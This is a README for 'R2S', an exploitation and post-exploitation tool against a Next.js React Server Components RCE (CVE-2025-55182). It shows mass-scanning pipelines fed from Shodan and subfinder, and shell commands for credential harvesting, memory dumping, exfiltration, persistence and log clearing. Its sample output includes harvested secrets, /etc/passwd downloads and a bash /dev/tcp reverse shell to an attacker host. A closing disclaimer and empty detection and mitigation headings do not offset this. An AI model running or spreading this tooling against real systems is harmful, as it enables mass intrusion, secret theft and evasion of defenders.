R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.
Advanced Post-Exploitation Framework for Next.js React Server Components RCE
Features • Installation • Usage • Commands • Examples
R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.
.env files and configuration files# Python 3.6 or higher
python3 --version
# Install dependencies
pip3 install requests urllib3
# Clone or download the tool
cd r2s-main
# Make executable (optional)
chmod +x r2s_enhanced.py
# Run the tool
python3 r2s_enhanced.py -h
python3 r2s_enhanced.py [OPTIONS]
| Option | Description | Default |
|---|---|---|
-u, --url | Single target URL | - |
-l, --list | File containing list of URLs | - |
-c, --cmd | Initial command to execute | id |
-t, --threads | Number of scanning threads | 30 |
-p, --proxy | HTTP proxy (e.g., http://127.0.0.1:8080) | - |
-v, --verbose | Enable verbose output | False |
--http-port | HTTP server port for file transfer | 8000 |
python3 r2s_enhanced.py -u http://target.com
python3 r2s_enhanced.py -l targets.txt -t 50
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py
Once you gain RCE access, you'll enter an interactive shell with these commands:
upload <local_file> <remote_path> # Upload file to target
download <remote_file> <local_path> # Download file from target
cd <directory> # Change working directory
pwd # Print working directory
enum # Complete system enumeration
privesc # Privilege escalation checks
harvest # Credential harvesting
portscan <ip> # Scan internal network ports
memdump [pid] # Dump process memory for secrets
lateral # Lateral movement opportunities
escape # Container escape vectors
exfil [type] # Exfiltrate data (env/config/keys/db/logs/all)
reverse <lhost> <lport> # Try multiple reverse shell payloads
persist # Add basic persistence
advpersist # Add advanced persistence
stealth # Clear logs and hide tracks
save # Save current session
help, ? # Show help message
exit, quit # Exit interactive shell
Execute any shell command directly:
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd
$ python3 r2s_enhanced.py -u http://vulnerable-app.com
_ __ __ ____
/ | / /__ _ __/ /_/ __ \________
/ |/ / _ \| |/_/ __/ /_/ / ___/ _ \
/ /| / __/> </_ _/ _, _/ /__/ __/
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/
Next.js RSC Exploit Tool (CVE-2025-55182)
Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
>> CREDIT( G4rxd )
[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id
[VULN] http://vulnerable-app.com >>> RCE SUCCESS
Output: uid=1000(node) gid=1000(node) groups=1000(node)
[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse
[+] HTTP server started on 192.168.1.100:8000
next-rce:/app$
next-rce:/app$ enum
[*] Starting automated enumeration...
============================================================
[*] System Info
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
============================================================
[*] Current User
============================================================
node
uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)
============================================================
[*] Container Detection
============================================================
12:devices:/docker/a1b2c3d4e5f6
11:cpuset:/docker/a1b2c3d4e5f6
[Docker container detected]
...
# Upload a file
next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
[*] Uploading /tmp/exploit.sh (2048 bytes) via HTTP...
[+] Upload successful!
-rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh
# Download a file
next-rce:/app$ download /etc/passwd ./passwd.txt
[*] Downloading /etc/passwd via HTTP...
[+] Download successful! (1523 bytes)
Saved to: ./passwd.txt
next-rce:/app$ harvest
[*] Harvesting credentials...
[*] Environment Variables:
DATABASE_PASSWORD=super_secret_pass
API_KEY=sk-1234567890abcdef
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[*] .env Files:
/app/.env
/app/.env.production
/var/www/.env.local
[*] SSH Keys:
/home/node/.ssh/id_rsa
/root/.ssh/id_rsa
...
next-rce:/app$ reverse 192.168.1.100 4444
[*] Starting reverse shell attempts to 192.168.1.100:4444
[!] Make sure you have a listener running: nc -lvnp 4444
[*] Trying 25 different reverse shell payloads...
[1/25] Trying Bash TCP... ✓ Executed
[?] Did you receive a connection? (y/n/s to stop): y
[+] SUCCESS! Reverse shell established using: Bash TCP
[*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
$ cat targets.txt
http://app1.example.com
http://app2.example.com
http://app3.example.com
$ python3 r2s_enhanced.py -l targets.txt -t 50
[*] Loaded 3 targets. Starting scan with 50 threads...
[VULN] http://app1.example.com >>> RCE SUCCESS
[VULN] http://app3.example.com >>> RCE SUCCESS
[*] Scan completed.
next-rce:/app$ privesc
[*] Checking privilege escalation vectors...
[*] SUID Binaries:
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
[*] Sudo Permissions:
User node may run the following commands:
(ALL : ALL) NOPASSWD: /usr/bin/docker
[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
[*] Docker Group:
In docker group - EXPLOITABLE!
...
next-rce:/app$ escape
[*] Checking container escape vectors...
[*] Container Type:
12:devices:/docker/a1b2c3d4e5f6
[*] Privileged Container:
PRIVILEGED
[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
[*] Capabilities:
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
[Full capabilities - container is privileged]
...
The tool includes 25+ reverse shell payloads across multiple languages and techniques:
Automatically detects and extracts credentials from:
Identifies and analyzes:
FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY
This tool is provided for educational purposes and authorized penetration testing only. Usage of this tool for attacking targets without prior mutual consent is illegal. The author is not responsible for any misuse or damage caused by this tool.
Requirements for legal use:
Detection:
Next-Action headerschild_process.execSync in Next.js logsMitigation:
Contributions are welcome! Please ensure all contributions are for educational and defensive security purposes.
G4rxd
This project is licensed for educational and authorized testing purposes only.
⚡ Happy Ethical Hacking! ⚡
Remember: With great power comes great responsibility.